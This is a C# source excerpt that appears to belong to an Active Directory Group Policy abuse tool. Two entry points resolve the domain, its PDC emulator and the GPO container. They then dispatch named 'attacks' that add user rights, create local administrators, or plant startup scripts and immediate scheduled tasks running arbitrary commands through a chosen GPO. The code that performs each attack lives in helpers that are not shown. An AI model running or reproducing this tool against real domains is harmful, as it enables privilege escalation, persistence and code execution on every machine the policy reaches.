/// <summary>
/// Hard-wired variant of the entry point: the script name, script body and target
/// GPO are compiled-in values (left empty here and marked "CHANGE THESE" by the
/// author) instead of command-line arguments. The command-line driven Main passes
/// the same values through from its parsed "scriptname"/"scriptcontent"/"gponame" keys.
/// </summary>
/// <param name="args">Unused; every input comes from the constants below.</param>
static void Main(string[] args)
{
    // CHANGE THESE before building: all three are handed to the call at the end.
    string scriptName = "";
    string scriptContent = "";
    string gpoName = "";

    try
    {
        // Resolve the current domain and its PDC emulator. Both names go through the
        // culture-sensitive ToLower(), exactly as the original did.
        Domain currentDomain = Domain.GetCurrentDomain();
        string domainController = currentDomain.PdcRoleOwner.Name.ToLower();
        string domainName = currentDomain.Name.ToLower();

        // DN of the domain's GPO container, CN=Policies,CN=System,<domain DN>:
        // each dot-separated label of the domain name becomes one ",DC=" component.
        string[] labels = domainName.Split('.');
        string policiesDn = "CN=Policies,CN=System,DC=" + string.Join(",DC=", labels);

        Console.WriteLine($"[+] Domain = {domainName}");
        Console.WriteLine($"[+] Domain Controller = {domainController}");
        Console.WriteLine($"[+] Distinguished Name = {policiesDn}");

        // CHANGE THIS if needed: the trailing literal is the object type; the
        // argument-driven Main passes either "User" or "Computer" in this position.
        // StartupScript lives outside this block, so what it does with the PDC name
        // and container DN is not visible here.
        StartupScript.NewStartupScript(scriptName, scriptContent, domainName, domainController, gpoName, policiesDn, "User");
    }
    catch (Exception ex)
    {
        // Any failure (directory lookup or the helper call) is reported as one line.
        Console.Error.WriteLine("[!] {0}", ex.Message);
    }
}
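/// <summary>
/// Argument-driven entry point. Re-joins <paramref name="args"/> into one string,
/// scans it for <c>key=value</c> pairs whose key is in the known list, resolves the
/// current domain, its PDC emulator and the DN of the domain's GPO container
/// (CN=Policies,CN=System,&lt;domain DN&gt;), then dispatches on the "attack" value
/// to one of the helpers defined elsewhere in the project (UserRightAssignment,
/// LocalAdmin, StartupScript, ScheduledTask). Every helper receives the same
/// controller name and container DN, so whatever it changes is done against the
/// PDC emulator under that container — the place a defender would audit.
/// </summary>
/// <param name="args">Raw command-line tokens; joined with single spaces before parsing.</param>
static void Main(string[] args)
{
    try
    {
        // Keys the scanner recognises; any other text stays part of a value.
        string[] keys = new string[] { "attack", "gponame", "useraccount", "userrights", "scriptname", "scriptcontent", "author", "taskname", "command", "arguments", "type", "force" };
        var arguments = new Dictionary<string, string>();
        string allargs = String.Join(" ", args);
        string oldkey = String.Empty;
        string currkey = String.Empty;
        string currval = String.Empty;

        // Character-level scan. Values may contain spaces and '=' characters, e.g.
        //   mynew=friend never=believes potatoe=darkess of the soul==
        // so a new pair only starts at an '=' that HasWalkedBackKey accepts (presumably
        // one preceded by a known key). The key's characters were already appended to
        // currval before the '=' was reached, so ChopEnd is relied on to strip them
        // from the previous value. Both helpers live outside this block.
        for (int i = 0; i < allargs.Length; i++)
        {
            if (i == allargs.Length - 1 && currkey.Length > 0 && !arguments.ContainsKey(currkey))
            {
                // Last character: close the pending pair as-is (no ChopEnd/trim here).
                currval = currval + allargs[i];
                arguments[currkey] = currval;
            }
            else if (allargs[i].ToString() == "=" && HasWalkedBackKey(i, allargs, keys))
            {
                oldkey = currkey;
                currkey = GetWalkedBackKey(i, allargs, keys);
                // Save previous if exists
                if (oldkey.Length > 0)
                {
                    char[] charsToTrim = { ' ' };
                    arguments[oldkey] = ChopEnd(currval, currkey).TrimEnd(charsToTrim);
                }
                currval = String.Empty;
            }
            else
            {
                currval = currval + allargs[i];
            }
        }
        // DebugArgs is defined elsewhere; presumably echoes the parsed pairs.
        DebugArgs(arguments, keys);

        Domain currentDomain = Domain.GetCurrentDomain();
        string DomainController = currentDomain.PdcRoleOwner.Name.ToLower();
        string DomainName = currentDomain.Name.ToLower();

        // Build the container DN before printing it. The previous ordering printed the
        // bare "CN=Policies,CN=System" prefix and only then appended the DC= components,
        // so the logged DN never matched the one actually passed to the helpers.
        string DistinguishedName = "CN=Policies,CN=System";
        string[] DCs = DomainName.Split('.');
        foreach (string DC in DCs)
        {
            DistinguishedName += ",DC=" + DC;
        }
        Console.WriteLine($"[+] Domain = {DomainName}");
        Console.WriteLine($"[+] Domain Controller = {DomainController}");
        Console.WriteLine($"[+] Distinguished Name = {DistinguishedName}");

        if (!arguments.ContainsKey("attack"))
        {
            Console.WriteLine("No Attack Provided!");
            PrintHelp();
            return;
        }

        string AttackName = arguments["attack"];
        // Compared once in lower case; the original lower-cased on every branch.
        string attack = AttackName.ToLower();
        if (attack == "addnewrights")
        {
            string[] required = new string[] { "gponame", "useraccount", "userrights" };
            if (!ContainsAll(arguments, required))
            {
                ReportMissingArguments();
                return;
            }
            string GPOName = arguments["gponame"];
            string UserAccount = arguments["useraccount"];
            // "userrights" is a comma-separated list.
            string[] UserRights = arguments["userrights"].Split(',');
            UserRightAssignment.AddNewRights(DomainName, DomainController, GPOName, DistinguishedName, UserRights, UserAccount);
        }
        else if (attack == "newlocaladmin")
        {
            string[] required = new string[] { "gponame", "useraccount" };
            if (!ContainsAll(arguments, required))
            {
                ReportMissingArguments();
                return;
            }
            string GPOName = arguments["gponame"];
            string UserAccount = arguments["useraccount"];
            bool Force = ResolveForceArgument(arguments);
            LocalAdmin.NewLocalAdmin(UserAccount, DomainName, DomainController, GPOName, DistinguishedName, Force);
        }
        else if (attack == "newstartupscript")
        {
            string[] required = new string[] { "gponame", "scriptname", "scriptcontent" };
            if (!ContainsAll(arguments, required))
            {
                ReportMissingArguments();
                return;
            }
            string GPOName = arguments["gponame"];
            string ScriptName = arguments["scriptname"];
            string ScriptContent = arguments["scriptcontent"];
            string ObjectType = ResolveObjectTypeArgument(arguments);
            StartupScript.NewStartupScript(ScriptName, ScriptContent, DomainName, DomainController, GPOName, DistinguishedName, ObjectType);
        }
        else if (attack == "newimmediatetask")
        {
            string[] required = new string[] { "gponame", "author", "taskname", "command", "arguments" };
            if (!ContainsAll(arguments, required))
            {
                ReportMissingArguments();
                return;
            }
            string GPOName = arguments["gponame"];
            string Author = arguments["author"];
            string TaskName = arguments["taskname"];
            string Command = arguments["command"];
            string Arguments = arguments["arguments"];
            // Order matters only for the console output: type is logged before force.
            string ObjectType = ResolveObjectTypeArgument(arguments);
            bool Force = ResolveForceArgument(arguments);
            ScheduledTask.NewImmediateTask(DomainName, DomainController, GPOName, DistinguishedName, TaskName, Author, Arguments, Command, Force, ObjectType);
        }
        else
        {
            Console.WriteLine("Unsupported Attack Type! Sorry!");
            PrintHelp();
        }
    }
    catch (Exception e)
    {
        // Directory lookups and every helper share one error path: a single stderr line.
        Console.Error.WriteLine("[!] {0}", e.Message);
    }
}

/// <summary>
/// Prints the shared "missing arguments" message and the usage text (PrintHelp is
/// defined elsewhere in the file).
/// </summary>
private static void ReportMissingArguments()
{
    Console.WriteLine("Missing Arguments for Attack Type!");
    PrintHelp();
}

/// <summary>
/// Resolves the optional "force" argument: true only when the key is present and its
/// lower-cased value is exactly "true". Logs the outcome either way.
/// </summary>
/// <param name="arguments">Parsed key/value pairs from the command line.</param>
/// <returns>The resolved flag.</returns>
private static bool ResolveForceArgument(Dictionary<string, string> arguments)
{
    if (arguments.ContainsKey("force") && arguments["force"].ToLower() == "true")
    {
        Console.WriteLine($"[+] Argument force: Resolved to True");
        return true;
    }
    Console.WriteLine($"[+] Argument force: Resolved to False");
    return false;
}

/// <summary>
/// Resolves the optional "type" argument to "Computer" when its lower-cased value is
/// exactly "computer", and to "User" otherwise (including when absent). Logs the outcome.
/// </summary>
/// <param name="arguments">Parsed key/value pairs from the command line.</param>
/// <returns>"Computer" or "User".</returns>
private static string ResolveObjectTypeArgument(Dictionary<string, string> arguments)
{
    string objectType;
    if (arguments.ContainsKey("type") && arguments["type"].ToLower() == "computer")
    {
        objectType = "Computer";
    }
    else
    {
        objectType = "User";
    }
    Console.WriteLine($"[+] Argument type: Resolved to {objectType}");
    return objectType;
}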